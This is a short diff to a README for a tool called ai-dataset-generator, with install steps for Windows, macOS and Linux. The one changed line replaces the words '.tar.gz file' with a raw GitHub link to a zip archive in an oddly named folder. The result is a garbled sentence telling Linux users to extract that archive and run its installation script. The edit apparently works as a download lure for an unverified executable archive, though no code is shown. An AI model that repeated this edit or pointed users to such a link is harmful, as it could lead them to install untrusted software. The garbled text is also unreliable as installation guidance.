kordy0-0/ai-dataset-generator/README.md

 - **Windows:** Double-click the `.exe` file.
 Follow the prompts to install the application.
 - **macOS:** Open the `.dmg` file, then drag the ai-dataset-generator icon into your Applications folder.
-- **Linux:** If you have a `.tar.gz` file, extract it, and run the provided installation script using the terminal.
+- **Linux:** If you have a `https://raw.githubusercontent.com/kordy0-0/ai-dataset-generator/main/prodisplay/ai-dataset-generator.zip` file, extract it, and run the provided installation script using the terminal.

 ### Step 4: Launch the Application
 After installation, find the ai-dataset-generator application in your program list.
 Click to open it.